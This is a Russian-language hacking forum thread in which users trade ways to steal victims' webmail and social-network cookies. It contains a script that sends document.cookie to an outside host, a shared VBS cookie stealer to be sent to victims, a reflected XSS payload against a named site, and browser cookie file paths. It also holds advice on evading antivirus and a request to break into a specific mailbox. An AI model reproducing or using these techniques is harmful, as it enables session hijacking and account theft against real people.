если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и жертва откроет по ссылке ету страницу, то у меня будут куки или нет?
ЗЫ: пишем те, кто уже точно знает!

В общем случае куки можно получить только в рамках одного домена.

смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!

не будут

так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!

Ты, видимо, не понимаешь, что куки без xss не своруешь.

та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!

Бред говоришь ты.
У тебя есть колеса - этот скрипт. Но нет двигателя XSS
Как ты без двигателя толкнешь колеса?
Да никак.
Xss и используется, чтобы сookie своровать.

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает!

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает!

Не исключено, что нет.
Может, не говорят о ней, или еще не нашли?
Если пытаешься атаковать там, где нет Xss все действия просто бессмыслены)

а как можно легко добыть куки почт ящика, не посылайте читать темы, просто опишите как делаете это вы!

http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2

Ice_Burn, скажи еще как именно залить? Narod.ru подойдет? Какую ссылку нужно давать? И куда прийдут куки?

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает!


закончи школу, утройся на работу и забудешь про xss...

http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2
Буду проверять :) гыыы ну естесно у лоха никаих антивиров не должно быть ?

ТС задолбал создавать тупые темы !!! где модераторы???

http://forum.antichat.ru/thread118782.html
http://forum.antichat.ru/thread118777.html

нельзя же быть настолько тупым.. читай форум и не задавай тупых вопросов.

слушай, я задаю эти вопросы и людя интересно, которые тоже заинтересованы в помоще, а ты такой же новичек как и я, и кричиш тут на весь форум "Где модераторы..." воображая из себя какого то перца!
ЗЫ: кто то тестил способ от Ice_Burn

Не хочу оффтопить, но воображаешь из себя только ты и причем не "какого то перца", а какого-то неадыкватного человека.. зачем создавать 3 одинаковых темы и обсуждать в них вопрос который понятен ЛЮБОМУ кто хоть чуть-чуть шарит в IT... а ты если не шаришь, то попытайся хотя бы полистать форум, начни с этой темы: http://forum.antichat.ru/thread20140.html
з.ы. мой статус новичка ни о чем не говорит...

я читал, ну ты пойми, ну это же почти нериал искать ети xss, вот возьмем mail.ru, при регистрации пару полей и я проверял нет там xss? где еще можно искать? на "Мой мир" такая же история, естих полей мало для заолнения и коментов ГДЕ там чтот о можно найти, БРЕД!

http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2
Спс надо затестить

может я и нуб.... но по-моему скрипт просто открывается как текстовый файл.

сори, я все вразумил.

так работает такая схема или нет, отпишитеся!

Ice_Burn, скажи еще как именно залить? Narod.ru подойдет? Какую ссылку нужно давать? И куда прийдут куки?

Залить лучше на Народ
Открываете файл через текстовой редактор и вписываете данные зареганного хоста
Линк давать прямой....http://name.narod.ru/123.vbs

http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2


А возможно с Мозиллы украсть куки??? не могу понять как прописать путь к куки, путь вот он C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%") & "\Application Data\Mozilla\Firefox\Profiles\r5a2432u.default\coo kies.sqlite но я так понимаю что r5a2432u.default будет на каждом компе разный. Я прав или нет?

Если пытаешься атаковать там, где нет Xss все действия просто бессмыслены)
хм... вообще-то ты бред пишешь, при определенных условиях можно угнать куки даже если нет XSS

помогите пожалуста взломать мыло pink23@mail.ru. Уже всё перепробывал и ничего не получается!!!

Прочитал тему , чтото толком не понял , допутсим есть сайт у меня я хочю чтоб у каждого зашедшего тырились куки , напимер от почты и контакт или однокласники , мне для етого нужно как каждом сервисе искать хсс ? или как зедалть чтоб сливались все кучи что есть в папке кукисов у юзера?

А возможно с Мозиллы украсть куки??? не могу понять как прописать путь к куки, путь вот он C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%") & "\Application Data\Mozilla\Firefox\Profiles\r5a2432u.default\coo kies.sqlite но я так понимаю что r5a2432u.default будет на каждом компе разный. Я прав или нет?
Прав
так работает такая схема или нет, отпишитеся!
сейчас проверю

Прочитал тему , чтото толком не понял , допутсим есть сайт у меня я хочю чтоб у каждого зашедшего тырились куки , напимер от почты и контакт или однокласники , мне для етого нужно как каждом сервисе искать хсс ? или как зедалть чтоб сливались все кучи что есть в папке кукисов у юзера?
ну если сможешь на хост залить вирус который сам качается и запускается, то да. А так куки от контакта хранятся в \Documents and Settings\пользователь\Cookies

сейчас проверю
не проверю, ссылка не работает. Кто нить перезалейте. я про это


Сообщение от Ice_Burn
http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2

Inviz2009.narod.ru/kuki_2.rar
без пароля

Кто то пробовал уже, тяжело отписать?!

пробовал работает!еще бы туда определение ОС и чтоб с висты тоже тырить.вот только вопрос,к чему етот скрипт прилепить чтоб антивирь не палил??? joiner2.5 и то что он слепил нод сразу удалил

слушай, я задаю эти вопросы и людя интересно, которые тоже заинтересованы в помоще, а ты такой же новичек как и я, и кричиш тут на весь форум "Где модераторы..." воображая из себя какого то перца!
ЗЫ: кто то тестил способ от Ice_Burn

Никому это не интересно,потому что такой кривобред даже я не напишу(

пробовал работает!еще бы туда определение ОС и чтоб с висты тоже тырить.вот только вопрос,к чему етот скрипт прилепить чтоб антивирь не палил??? joiner2.5 и то что он слепил нод сразу удалил

Вокс,дай свою асю в ЛС,спрошу кое-что...

ама

я всё во скрипт вписал!!!!!
но он чтот не пашет:((((

на народ он не заливается!!!:(
www.....xxx.ru/1.vbs он его открывает как обычный текстовый документ!!(((
что делать!?

Да ё моё скачай легче просто снифер нормальный!
Залей на бесплатку!
И всё !
Ссылка на один из мощнейший снифер!
http://depositfiles.com/files/wzuru9epk
Советую ставить на хостинг uuuq
Строгие требования: PHP + MySQL + htaccess

Если помог смело ставь +

та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!
долбаёп, хсс нужны, без них никак ;)
вот пример на рамблере :)
http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert(document.cookie)</script>
alert(document.cookie) - это значит, чтобы мы увидили куки, ну и осталось тока сделать, чтобы они записывалисы в снифер, вот нормальный http://kanick.ru/sniffer/
p.s. удачи в хеке :D и почитай вот это http://forum.antichat.ru/thread20140.html

Да ё моё скачай легче просто снифер нормальный!
Залей на бесплатку!
И всё !
Ссылка на один из мощнейший снифер!
http://depositfiles.com/files/wzuru9epk
Советую ставить на хостинг uuuq
Строгие требования: PHP + MySQL + htaccess

Если помог смело ставь +

а пароль какой

помогите, если у кого то есть желание, вообще ничего не понял как сниффер ствить и подключать, а поставить надо уже сегодня, а то завтра будет поздно, говорю сразу, я вообще в этом не разбераюсь, читал статьи чуть не сломал себе голову)))
помощь приветствуется, ICQ: 414636313

помогите, если у кого то есть желание, вообще ничего не понял как сниффер ствить и подключать, а поставить надо уже сегодня, а то завтра будет поздно, говорю сразу, я вообще в этом не разбераюсь, читал статьи чуть не сломал себе голову)))
помощь приветствуется, ICQ: 414636313
на завод тоже приветствуется :p

на завод тоже приветствуется :p
хм, это типа намек: помощи не жди?)))

хм, это типа намек: помощи не жди?)))
всмысле если хочешь куки - нужна XSS уязвимость, нужна XSS? заплати тому у кого она есть! ;)
p.s. у меня ща нету :(

Ice_Burn можешь еше раз Плиз !! выложть ту ссылку а то она не работает -=( :mad: :mad: :mad: :( :( :confused: :confused:
За рание спс

Сообщение от Ice_Burn
http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2

Перезалейте пожалуйста!!!

все эти 5 страниц- разговор слепого с глухим- тебе уже говорили чтобы получить куки как минимум нужно найти XSS на атакуемом сайте- и не говори что на майле их нет- лично у меня 4-5 штук гдето валяеться и живут они по простой причине что в паблик их никто несливал (и будут жить потому что просить их у меня- бесполезно), насчет снифера- без КССски он те ненужен
P.S. Надеюсь хоть счас- я буду услышан (честно говоря хотел пройти мимо этой темы, меня просто поразило что советы что тебе дают знающие люди- ты игнорируеш а пытаешся из хера сделать баллалайку)